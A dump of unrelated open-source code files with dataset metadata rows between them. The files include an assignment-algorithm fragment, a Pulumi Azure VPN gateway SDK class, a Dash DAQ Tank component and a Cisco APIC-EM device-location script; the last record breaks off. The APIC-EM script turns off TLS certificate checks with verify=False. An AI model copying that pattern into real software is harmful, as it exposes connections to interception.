np.argmin(temp) u1 = temp[j1] temp[j1] = np.max(temp) + 1 j2 = np.argmin(temp) u2 = temp[j2] if u1 < u2: self._v[j1] -= u2 - u1 elif self._y[j1] != -1: j1 = j2 k = self._y[j1] if k != -1: self._x[k] = -1 self._x[i] = j1 self._y[j1] = i i = k if np.allclose(u1, u2) or k == -1: break def _update_cred(self): """ Updates the reduced costs with the values from the dual solution """ ui = np.diag(self.c[:, self._x]) - self._v[self._x] self.cred = self.c - ui[:, None] - self._v[None, :] def _augment(self): """ Finds a minimum cost path and adds it to the matching """ #build a minimum cost tree self._build_tree() #update prices delta = self._d[self._ready] - self._mu self._v[self._ready] += delta #augment the solution with the minimum cost path from the #tree. Follows an alternating path along matched, unmatched #edges from X to Y while True: self._i = self._pred[self._j] self._y[self._j] = self._i k = self._j self._j = self._x[self._i] self._x[self._i] = k if self._i == self._istar: break self._update_cred() def _build_tree(self): """ Builds the tree finding an augmenting path. Alternates along matched and unmatched edges between X and Y. The paths are stored in self._pred (new predecessor of nodes in Y), and self._x and self._y """ #find unassigned i* self._istar = np.argmin(self._x) #compute distances self._d = self.c[self._istar] - self._v self._pred = np.zeros(self.n, dtype=np.int) + self._istar #initialize sets #READY: set of nodes visited and in the path (whose price gets #updated in augment) #SCAN: set of nodes at the bottom of the tree, which we need to #look at #T0DO: unvisited nodes self._ready = np.zeros(self.n, dtype=np.bool) self._scan = np.zeros(self.n, dtype=np.bool) self._todo = np.zeros(self.n, dtype=np.bool) + True while True: #populate scan with minimum reduced distances if np.max(self._scan) == 0: self._mu = np.min(self._d[self._todo]) self._scan[np.where(self._d == self._mu)] = 1 self._todo[self._scan] = 0 if np.min(self._y * self._scan) < self.epsilon: self._j = np.argmin(self._y * self._scan) return #pick jstar from scan (scan always has at least 1) self._jstar = np.argmax(self._scan) #pick i associated with jstar self._i = self._y[self._jstar] self._scan[self._jstar] = 0 self._ready[self._jstar] = 1 #find shorter distances newdists = self._mu + self.cred[self._i, :] shorter = (newdists < self._d) * self._todo #update distances self._d[shorter] = newdists[shorter] #update predecessors self._pred[shorter] = self._i for self._j in np.argwhere((self._d == self._mu) * self._todo).flatten(): if self._y[self._j] == -1: return self._scan[self._j] = 1 self._todo[self._j] = 0
32.344828
78
0.541844
795a76450f81882f3ef1bec075ff44ad7a0bea41
19,306
py
Python
sdk/python/pulumi_azure_native/network/v20191201/p2s_vpn_gateway.py
sebtelko/pulumi-azure-native
711ec021b5c73da05611c56c8a35adb0ce3244e4
[ "Apache-2.0" ]
null
null
null
sdk/python/pulumi_azure_native/network/v20191201/p2s_vpn_gateway.py
sebtelko/pulumi-azure-native
711ec021b5c73da05611c56c8a35adb0ce3244e4
[ "Apache-2.0" ]
null
null
null
sdk/python/pulumi_azure_native/network/v20191201/p2s_vpn_gateway.py
sebtelko/pulumi-azure-native
711ec021b5c73da05611c56c8a35adb0ce3244e4
[ "Apache-2.0" ]
null
null
null
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi SDK Generator. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from ... import _utilities from . import outputs from ._inputs import * __all__ = ['P2sVpnGatewayArgs', 'P2sVpnGateway'] @pulumi.input_type class P2sVpnGatewayArgs: def __init__(__self__, *, resource_group_name: pulumi.Input[str], gateway_name: Optional[pulumi.Input[str]] = None, id: Optional[pulumi.Input[str]] = None, location: Optional[pulumi.Input[str]] = None, p2_s_connection_configurations: Optional[pulumi.Input[Sequence[pulumi.Input['P2SConnectionConfigurationArgs']]]] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, virtual_hub: Optional[pulumi.Input['SubResourceArgs']] = None, vpn_gateway_scale_unit: Optional[pulumi.Input[int]] = None, vpn_server_configuration: Optional[pulumi.Input['SubResourceArgs']] = None): """ The set of arguments for constructing a P2sVpnGateway resource. :param pulumi.Input[str] resource_group_name: The resource group name of the P2SVpnGateway. :param pulumi.Input[str] gateway_name: The name of the gateway. :param pulumi.Input[str] id: Resource ID. :param pulumi.Input[str] location: Resource location. :param pulumi.Input[Sequence[pulumi.Input['P2SConnectionConfigurationArgs']]] p2_s_connection_configurations: List of all p2s connection configurations of the gateway. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags. :param pulumi.Input['SubResourceArgs'] virtual_hub: The VirtualHub to which the gateway belongs. :param pulumi.Input[int] vpn_gateway_scale_unit: The scale unit for this p2s vpn gateway. :param pulumi.Input['SubResourceArgs'] vpn_server_configuration: The VpnServerConfiguration to which the p2sVpnGateway is attached to. """ pulumi.set(__self__, "resource_group_name", resource_group_name) if gateway_name is not None: pulumi.set(__self__, "gateway_name", gateway_name) if id is not None: pulumi.set(__self__, "id", id) if location is not None: pulumi.set(__self__, "location", location) if p2_s_connection_configurations is not None: pulumi.set(__self__, "p2_s_connection_configurations", p2_s_connection_configurations) if tags is not None: pulumi.set(__self__, "tags", tags) if virtual_hub is not None: pulumi.set(__self__, "virtual_hub", virtual_hub) if vpn_gateway_scale_unit is not None: pulumi.set(__self__, "vpn_gateway_scale_unit", vpn_gateway_scale_unit) if vpn_server_configuration is not None: pulumi.set(__self__, "vpn_server_configuration", vpn_server_configuration) @property @pulumi.getter(name="resourceGroupName") def resource_group_name(self) -> pulumi.Input[str]: """ The resource group name of the P2SVpnGateway. """ return pulumi.get(self, "resource_group_name") @resource_group_name.setter def resource_group_name(self, value: pulumi.Input[str]): pulumi.set(self, "resource_group_name", value) @property @pulumi.getter(name="gatewayName") def gateway_name(self) -> Optional[pulumi.Input[str]]: """ The name of the gateway. """ return pulumi.get(self, "gateway_name") @gateway_name.setter def gateway_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "gateway_name", value) @property @pulumi.getter def id(self) -> Optional[pulumi.Input[str]]: """ Resource ID. """ return pulumi.get(self, "id") @id.setter def id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "id", value) @property @pulumi.getter def location(self) -> Optional[pulumi.Input[str]]: """ Resource location. """ return pulumi.get(self, "location") @location.setter def location(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "location", value) @property @pulumi.getter(name="p2SConnectionConfigurations") def p2_s_connection_configurations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['P2SConnectionConfigurationArgs']]]]: """ List of all p2s connection configurations of the gateway. """ return pulumi.get(self, "p2_s_connection_configurations") @p2_s_connection_configurations.setter def p2_s_connection_configurations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['P2SConnectionConfigurationArgs']]]]): pulumi.set(self, "p2_s_connection_configurations", value) @property @pulumi.getter def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]: """ Resource tags. """ return pulumi.get(self, "tags") @tags.setter def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]): pulumi.set(self, "tags", value) @property @pulumi.getter(name="virtualHub") def virtual_hub(self) -> Optional[pulumi.Input['SubResourceArgs']]: """ The VirtualHub to which the gateway belongs. """ return pulumi.get(self, "virtual_hub") @virtual_hub.setter def virtual_hub(self, value: Optional[pulumi.Input['SubResourceArgs']]): pulumi.set(self, "virtual_hub", value) @property @pulumi.getter(name="vpnGatewayScaleUnit") def vpn_gateway_scale_unit(self) -> Optional[pulumi.Input[int]]: """ The scale unit for this p2s vpn gateway. """ return pulumi.get(self, "vpn_gateway_scale_unit") @vpn_gateway_scale_unit.setter def vpn_gateway_scale_unit(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "vpn_gateway_scale_unit", value) @property @pulumi.getter(name="vpnServerConfiguration") def vpn_server_configuration(self) -> Optional[pulumi.Input['SubResourceArgs']]: """ The VpnServerConfiguration to which the p2sVpnGateway is attached to. """ return pulumi.get(self, "vpn_server_configuration") @vpn_server_configuration.setter def vpn_server_configuration(self, value: Optional[pulumi.Input['SubResourceArgs']]): pulumi.set(self, "vpn_server_configuration", value) class P2sVpnGateway(pulumi.CustomResource): @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, gateway_name: Optional[pulumi.Input[str]] = None, id: Optional[pulumi.Input[str]] = None, location: Optional[pulumi.Input[str]] = None, p2_s_connection_configurations: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['P2SConnectionConfigurationArgs']]]]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, virtual_hub: Optional[pulumi.Input[pulumi.InputType['SubResourceArgs']]] = None, vpn_gateway_scale_unit: Optional[pulumi.Input[int]] = None, vpn_server_configuration: Optional[pulumi.Input[pulumi.InputType['SubResourceArgs']]] = None, __props__=None): """ P2SVpnGateway Resource. :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] gateway_name: The name of the gateway. :param pulumi.Input[str] id: Resource ID. :param pulumi.Input[str] location: Resource location. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['P2SConnectionConfigurationArgs']]]] p2_s_connection_configurations: List of all p2s connection configurations of the gateway. :param pulumi.Input[str] resource_group_name: The resource group name of the P2SVpnGateway. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags. :param pulumi.Input[pulumi.InputType['SubResourceArgs']] virtual_hub: The VirtualHub to which the gateway belongs. :param pulumi.Input[int] vpn_gateway_scale_unit: The scale unit for this p2s vpn gateway. :param pulumi.Input[pulumi.InputType['SubResourceArgs']] vpn_server_configuration: The VpnServerConfiguration to which the p2sVpnGateway is attached to. """ ... @overload def __init__(__self__, resource_name: str, args: P2sVpnGatewayArgs, opts: Optional[pulumi.ResourceOptions] = None): """ P2SVpnGateway Resource. :param str resource_name: The name of the resource. :param P2sVpnGatewayArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. """ ... def __init__(__self__, resource_name: str, *args, **kwargs): resource_args, opts = _utilities.get_resource_args_opts(P2sVpnGatewayArgs, pulumi.ResourceOptions, *args, **kwargs) if resource_args is not None: __self__._internal_init(resource_name, opts, **resource_args.__dict__) else: __self__._internal_init(resource_name, *args, **kwargs) def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, gateway_name: Optional[pulumi.Input[str]] = None, id: Optional[pulumi.Input[str]] = None, location: Optional[pulumi.Input[str]] = None, p2_s_connection_configurations: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['P2SConnectionConfigurationArgs']]]]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, virtual_hub: Optional[pulumi.Input[pulumi.InputType['SubResourceArgs']]] = None, vpn_gateway_scale_unit: Optional[pulumi.Input[int]] = None, vpn_server_configuration: Optional[pulumi.Input[pulumi.InputType['SubResourceArgs']]] = None, __props__=None): if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = P2sVpnGatewayArgs.__new__(P2sVpnGatewayArgs) __props__.__dict__["gateway_name"] = gateway_name __props__.__dict__["id"] = id __props__.__dict__["location"] = location __props__.__dict__["p2_s_connection_configurations"] = p2_s_connection_configurations if resource_group_name is None and not opts.urn: raise TypeError("Missing required property 'resource_group_name'") __props__.__dict__["resource_group_name"] = resource_group_name __props__.__dict__["tags"] = tags __props__.__dict__["virtual_hub"] = virtual_hub __props__.__dict__["vpn_gateway_scale_unit"] = vpn_gateway_scale_unit __props__.__dict__["vpn_server_configuration"] = vpn_server_configuration __props__.__dict__["etag"] = None __props__.__dict__["name"] = None __props__.__dict__["provisioning_state"] = None __props__.__dict__["type"] = None __props__.__dict__["vpn_client_connection_health"] = None alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network/v20191201:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20180801:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20180801:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20181001:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20181001:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20181101:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20181101:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20181201:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20181201:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20190201:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20190201:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20190401:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20190401:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20190601:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20190601:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20190701:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20190701:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20190801:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20190801:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20190901:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20190901:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20191101:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20191101:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20200301:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20200301:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20200401:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20200401:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20200501:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20200501:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20200601:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20200601:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20200701:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20200701:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20200801:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20200801:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20201101:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20201101:P2sVpnGateway")]) opts = pulumi.ResourceOptions.merge(opts, alias_opts) super(P2sVpnGateway, __self__).__init__( 'azure-native:network/v20191201:P2sVpnGateway', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None) -> 'P2sVpnGateway': """ Get an existing P2sVpnGateway resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = P2sVpnGatewayArgs.__new__(P2sVpnGatewayArgs) __props__.__dict__["etag"] = None __props__.__dict__["location"] = None __props__.__dict__["name"] = None __props__.__dict__["p2_s_connection_configurations"] = None __props__.__dict__["provisioning_state"] = None __props__.__dict__["tags"] = None __props__.__dict__["type"] = None __props__.__dict__["virtual_hub"] = None __props__.__dict__["vpn_client_connection_health"] = None __props__.__dict__["vpn_gateway_scale_unit"] = None __props__.__dict__["vpn_server_configuration"] = None return P2sVpnGateway(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter def etag(self) -> pulumi.Output[str]: """ A unique read-only string that changes whenever the resource is updated. """ return pulumi.get(self, "etag") @property @pulumi.getter def location(self) -> pulumi.Output[str]: """ Resource location. """ return pulumi.get(self, "location") @property @pulumi.getter def name(self) -> pulumi.Output[str]: """ Resource name. """ return pulumi.get(self, "name") @property @pulumi.getter(name="p2SConnectionConfigurations") def p2_s_connection_configurations(self) -> pulumi.Output[Optional[Sequence['outputs.P2SConnectionConfigurationResponse']]]: """ List of all p2s connection configurations of the gateway. """ return pulumi.get(self, "p2_s_connection_configurations") @property @pulumi.getter(name="provisioningState") def provisioning_state(self) -> pulumi.Output[str]: """ The provisioning state of the P2S VPN gateway resource. """ return pulumi.get(self, "provisioning_state") @property @pulumi.getter def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]: """ Resource tags. """ return pulumi.get(self, "tags") @property @pulumi.getter def type(self) -> pulumi.Output[str]: """ Resource type. """ return pulumi.get(self, "type") @property @pulumi.getter(name="virtualHub") def virtual_hub(self) -> pulumi.Output[Optional['outputs.SubResourceResponse']]: """ The VirtualHub to which the gateway belongs. """ return pulumi.get(self, "virtual_hub") @property @pulumi.getter(name="vpnClientConnectionHealth") def vpn_client_connection_health(self) -> pulumi.Output['outputs.VpnClientConnectionHealthResponse']: """ All P2S VPN clients' connection health status. """ return pulumi.get(self, "vpn_client_connection_health") @property @pulumi.getter(name="vpnGatewayScaleUnit") def vpn_gateway_scale_unit(self) -> pulumi.Output[Optional[int]]: """ The scale unit for this p2s vpn gateway. """ return pulumi.get(self, "vpn_gateway_scale_unit") @property @pulumi.getter(name="vpnServerConfiguration") def vpn_server_configuration(self) -> pulumi.Output[Optional['outputs.SubResourceResponse']]: """ The VpnServerConfiguration to which the p2sVpnGateway is attached to. """ return pulumi.get(self, "vpn_server_configuration")
50.539267
2,705
0.681135
795a78b6e8232cd5b244db41fba7ce92da7f3c05
196
py
Python
runserver.py
dongbum/flask-board
7da191bea47184135ecf235b593e13ecf5793715
[ "MIT" ]
null
null
null
runserver.py
dongbum/flask-board
7da191bea47184135ecf235b593e13ecf5793715
[ "MIT" ]
null
null
null
runserver.py
dongbum/flask-board
7da191bea47184135ecf235b593e13ecf5793715
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- from board import create_app application = create_app() if __name__ == '__main__': print("starting test server...") application.run(host='127.0.0.1', port=5000)
19.6
48
0.658163
795a7963768701222eb88ce663883ff1212d34a9
3,029
py
Python
isi_sdk_7_2/isi_sdk_7_2/models/sync_reports.py
mohitjain97/isilon_sdk_python
a371f438f542568edb8cda35e929e6b300b1177c
[ "Unlicense" ]
24
2018-06-22T14:13:23.000Z
2022-03-23T01:21:26.000Z
isi_sdk_7_2/isi_sdk_7_2/models/sync_reports.py
mohitjain97/isilon_sdk_python
a371f438f542568edb8cda35e929e6b300b1177c
[ "Unlicense" ]
46
2018-04-30T13:28:22.000Z
2022-03-21T21:11:07.000Z
isi_sdk_7_2/isi_sdk_7_2/models/sync_reports.py
mohitjain97/isilon_sdk_python
a371f438f542568edb8cda35e929e6b300b1177c
[ "Unlicense" ]
29
2018-06-19T00:14:04.000Z
2022-02-08T17:51:19.000Z
# coding: utf-8 """ Isilon SDK Isilon SDK - Language bindings for the OneFS API # noqa: E501 OpenAPI spec version: 2 Contact: sdk@isilon.com Generated by: https://github.com/swagger-api/swagger-codegen.git """ import pprint import re # noqa: F401 import six from isi_sdk_7_2.models.sync_report import SyncReport # noqa: F401,E501 class SyncReports(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'reports': 'list[SyncReport]' } attribute_map = { 'reports': 'reports' } def __init__(self, reports=None): # noqa: E501 """SyncReports - a model defined in Swagger""" # noqa: E501 self._reports = None self.discriminator = None if reports is not None: self.reports = reports @property def reports(self): """Gets the reports of this SyncReports. # noqa: E501 :return: The reports of this SyncReports. # noqa: E501 :rtype: list[SyncReport] """ return self._reports @reports.setter def reports(self, reports): """Sets the reports of this SyncReports. :param reports: The reports of this SyncReports. # noqa: E501 :type: list[SyncReport] """ self._reports = reports def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, SyncReports): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other
26.33913
80
0.560911
795a79ff6e95b959a88968e45a61de536baeffd5
363
py
Python
platform/hwconf_data/zgm13/modules/MODEM/MODEM_behavior.py
lenloe1/v2.7
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
[ "Zlib" ]
null
null
null
platform/hwconf_data/zgm13/modules/MODEM/MODEM_behavior.py
lenloe1/v2.7
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
[ "Zlib" ]
1
2020-08-25T02:36:22.000Z
2020-08-25T02:36:22.000Z
platform/hwconf_data/zgm13/modules/MODEM/MODEM_behavior.py
lenloe1/v2.7
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
[ "Zlib" ]
1
2020-08-25T01:56:04.000Z
2020-08-25T01:56:04.000Z
from . import ExporterModel from . import MODEM_model from . import RuntimeModel class MODEM(ExporterModel.Module): def __init__(self, name=None): if not name: name = self.__class__.__name__ super(MODEM, self).__init__(name, visible=True, core=True) self.model = MODEM_model def set_runtime_hooks(self): pass
25.928571
66
0.674931
795a7a34b8667531a8405374a6d2969b57c5cda3
2,600
py
Python
lab6-04-delete-network-device-id-location.py
ralfraij/apicem-ll-sample-code
adb0988af7b506610b218db7136ec58354572f4b
[ "Apache-2.0" ]
1
2018-06-28T00:11:16.000Z
2018-06-28T00:11:16.000Z
lab6-04-delete-network-device-id-location.py
ralfraij/apicem-ll-sample-code
adb0988af7b506610b218db7136ec58354572f4b
[ "Apache-2.0" ]
null
null
null
lab6-04-delete-network-device-id-location.py
ralfraij/apicem-ll-sample-code
adb0988af7b506610b218db7136ec58354572f4b
[ "Apache-2.0" ]
null
null
null
import requests # We use Python "requests" module to do HTTP GET query import json # Import JSON encoder and decode module import sys from operator import itemgetter from apicem_config import * # APIC-EM IP is assigned in apicem_config.py requests.packages.urllib3.disable_warnings() # Remove this line if not using Python 3 # ***************************************** # IP of the network device that we want to remove the location # You need to assigned ip here to_delete = "10.10.40.66" # ***************************************** if to_delete == "": print ("Have you assigned a application name to be deleted ?") sys.exit(1) device_list = [] # create device id list url = "https://"+apicem_ip+"/api/v0/network-device/count" # API base url resp= requests.get(url,verify=False) # The response (result) from "GET /network-device/count" query response_json = resp.json() # Get the json-encoded content from response with "response_json = resp.json() count = response_json["response"] # Total count of network-device and convert it to string if count > 0 : device_list = [] url = "https://"+apicem_ip+"/api/v0/network-device/1/"+str(count) # API base url, convert 'count' to string resp= requests.get(url,verify=False) # The response (result) from "GET /network-device/{startIndex}/{recordsToReturn}" query response_json = resp.json() # Get the json-encoded content from response for item in response_json["response"]: if "locationName" in item: pass else: item["locationName"] = '' device_list.append([item["hostname"],item["type"],item["managementIpAddress"],item["id"],item["locationName"]]) device_list.sort() else: print ("No network device found !") sys.exit(1) # Check if selected network device has been assigned a location. Proceed if yes, do nothing if no # item[2] id the IP,item[3] is the network device id and item[4] is the locationName for item in device_list: if item[2] == to_delete: if item[4] != '': id = item[3] print ("Location %s will be deleted from this network device" % (item[4])) url = "https://"+apicem_ip+"/api/v0/network-device/"+id+"/location" resp= requests.delete(url,verify=False) print ("Status:",resp.status_code) print (resp.text) else: print ("No location is assigned to this network device, nothing to delete !") sys.exit(1) print ("Cannot find network device with this IP: ",to_delete)
44.067797
128
0.636538
795a7a9cbf7ba6dcb3fcbd2b582abb24de74f26d
2,090
py
Python
voltcycle/peak_detection_fxn.py
MariaPoliti/voltcycle
cc67ae91103ac6bdc0c7995834865d8bcb176ec3
[ "MIT" ]
null
null
null
voltcycle/peak_detection_fxn.py
MariaPoliti/voltcycle
cc67ae91103ac6bdc0c7995834865d8bcb176ec3
[ "MIT" ]
null
null
null
voltcycle/peak_detection_fxn.py
MariaPoliti/voltcycle
cc67ae91103ac6bdc0c7995834865d8bcb176ec3
[ "MIT" ]
null
null
null
"""This module contains a function to determine the peaks in the specified dataset, based on the y values (or current values). The function takes in the specified y column of the dataframe and outputs a list consisting of the index values of the peaks. This module calls the peakutils and numpy packages along with the'main.py' file in the master branch.""" import peakutils # import numpy as np # from . import core def peak_detection(data_y, scan_sign): """The function takes an input of the column containing the y variables in the dataframe, associated with the current. The function calls the split function, which splits the column into two arrays, one of the positive and one of the negative values. This is because cyclic voltammetry delivers negative peaks,but the peakutils function works better with positive peaks. The function also runs on the middle 80% of data to eliminate unnecessary noise and messy values associated with pseudo-peaks.The vectors are then imported into the peakutils. Indexes function to determine the significant peak for each array. The values are stored in a list, with the first index corresponding to the top peak and the second corresponding to the bottom peak. Parameters ---------- y column: pd.DataFrame/Series must be a column from a pandas dataframe scan_sign: str Can be 'positive' or 'negative' Return ------- peak_index: list A list with the index of the peaks from the top curve and bottom curve. """ peak_index = {} if scan_sign == 'positive': try: peak_index['peak_top'] = peakutils.indexes( data_y, thres=0.99, min_dist=50)[0] except IndexError: peak_index['peak_top'] = 0 # print(peak_index) else: try: peak_index['peak_bottom'] = peakutils.indexes( -data_y, thres=0.99, min_dist=50)[0] except IndexError: peak_index['peak_bottom'] = 0 return peak_index
39.433962
79
0.675598
795a7b483ea41a82238961f88dce62c117083703
4,169
py
Python
dash_daq/Tank.py
yordiverbeeck/dash-daq
7450d92f7c60d42a42f62dbaa0e5053f4432a3a1
[ "MIT" ]
null
null
null
dash_daq/Tank.py
yordiverbeeck/dash-daq
7450d92f7c60d42a42f62dbaa0e5053f4432a3a1
[ "MIT" ]
null
null
null
dash_daq/Tank.py
yordiverbeeck/dash-daq
7450d92f7c60d42a42f62dbaa0e5053f4432a3a1
[ "MIT" ]
null
null
null
# AUTO GENERATED FILE - DO NOT EDIT from dash.development.base_component import Component, _explicitize_args class Tank(Component): """A Tank component. A Tank component that fills to a value between some range. Keyword arguments: - id (string; optional): The ID used to identify this component in Dash callbacks. - base (number; default 10): Base to be used in logarithmic scale. - className (string; optional): Class to apply to the root component element. - color (string; optional): The color of tank fill. - height (number; default 192): The height of the tank in pixels. - label (dict; optional): Description to be displayed alongside the control. To control styling, pass an object with label and style properties. `label` is a string | dict with keys: - label (string; optional) - style (dict; optional) - labelPosition (a value equal to: 'top', 'bottom'; default 'top'): Where the component label is positioned. - logarithmic (boolean; optional): If set to True, a logarithmic scale will be used. - max (number; default 10): The maximum value of the tank. If logarithmic, represents the maximum exponent. - min (number; default 0): The minimum value of the tank. If logarithmic, represents minimum exponent. - scale (dict; optional): Configuration for the component scale. `scale` is a dict with keys: - custom (dict; optional): Custom scale marks. The key determines the position and the value determines what will show. If you want to set the style of a specific mark point, the value should be an object which contains style and label properties. `custom` is a number Or dict with keys: - label (string; optional) - style (string; optional) - interval (number; optional): Interval by which the scale goes up. Attempts to dynamically divide min-max range by default. - labelInterval (number; optional): Interval by which labels are added to scale marks. Defaults to 2 (every other mark has a label). - start (number; optional): Value to start the scale from. Defaults to min. - showCurrentValue (boolean; optional): If True, the current value of the tank will be displayed. - style (dict; optional): Style to apply to the root component element. - units (string; optional): Label for the current value. - value (number; optional): The value of tank. If logarithmic, the displayed value will be the logarithm of the inputted value. - width (number; default 112): The width of the tank in pixels.""" @_explicitize_args def __init__(self, id=Component.UNDEFINED, value=Component.UNDEFINED, height=Component.UNDEFINED, width=Component.UNDEFINED, color=Component.UNDEFINED, min=Component.UNDEFINED, max=Component.UNDEFINED, base=Component.UNDEFINED, logarithmic=Component.UNDEFINED, showCurrentValue=Component.UNDEFINED, units=Component.UNDEFINED, label=Component.UNDEFINED, labelPosition=Component.UNDEFINED, scale=Component.UNDEFINED, className=Component.UNDEFINED, style=Component.UNDEFINED, **kwargs): self._prop_names = ['id', 'base', 'className', 'color', 'height', 'label', 'labelPosition', 'logarithmic', 'max', 'min', 'scale', 'showCurrentValue', 'style', 'units', 'value', 'width'] self._type = 'Tank' self._namespace = 'dash_daq' self._valid_wildcard_attributes = [] self.available_properties = ['id', 'base', 'className', 'color', 'height', 'label', 'labelPosition', 'logarithmic', 'max', 'min', 'scale', 'showCurrentValue', 'style', 'units', 'value', 'width'] self.available_wildcard_properties = [] _explicit_args = kwargs.pop('_explicit_args') _locals = locals() _locals.update(kwargs) # For wildcard attrs args = {k: _locals[k] for k in _explicit_args if k != 'children'} for k in []: if k not in args: raise TypeError( 'Required argument `' + k + '` was not specified.') super(Tank, self).__init__(**args)
36.570175
487
0.675941
795a7bcb251377e29027af7e55401dd7e5d4408a
1,582
py
Python
scripts/sent_enc_nli/train_nli.py
lukecq1231/sent_enc_nli_sick
e71e6f245591214168ee8ff1588d1e8b866d7e2c
[ "BSD-3-Clause" ]
3
2017-10-11T21:00:55.000Z
2019-02-12T16:41:00.000Z
scripts/sent_enc_nli/train_nli.py
lukecq1231/sent_enc_nli_sick
e71e6f245591214168ee8ff1588d1e8b866d7e2c
[ "BSD-3-Clause" ]
null
null
null
scripts/sent_enc_nli/train_nli.py
lukecq1231/sent_enc_nli_sick
e71e6f245591214168ee8ff1588d1e8b866d7e2c
